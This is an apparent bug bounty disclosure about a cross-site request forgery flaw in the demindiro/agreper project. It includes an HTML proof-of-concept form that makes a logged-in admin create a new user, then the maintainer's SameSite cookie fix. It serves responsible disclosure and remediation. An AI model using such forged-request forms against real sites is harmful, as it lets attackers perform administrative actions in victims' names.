Anti-CSRF mechanism is not present in demindiro/agreper

Valid

Reported on

Jan 24th 2023


Description

The application is vulnerable to a CSRF attack.

Proof of Concept

  1. Login as admin.
  2. Open the following HTML file in the browser. This action is equivalent to clicking a link sent by an attacker.

trap.html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/admin/user/new/" method="POST">
      <input type="hidden" name="name" value="csrf" />
      <input type="hidden" name="password" value="password" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  1. Click the button.
  2. A new user is created.

Impact

This vulnerability is capable of allowing an attacker to force a victim to perform admin actions such as:

  • Creating a new user
  • Changing user's role

References

We are processing your report and will contact the demindiro/agreper team within 24 hours. 2 months ago
We have contacted a member of the demindiro/agreper team and are waiting to hear back 2 months ago
David Hoppenbrouwers validated this vulnerability 2 months ago

Apparently Flask doesn't set SameSite by default. Adding app.config['SESSION_COOKIE_SAMESITE'] = 'Lax' resolves this issue.

Thanks!

bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Hoppenbrouwers marked this as fixed in 0.1.1b with commit 09f56b 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
David Hoppenbrouwers published this vulnerability 2 months ago
to join this conversation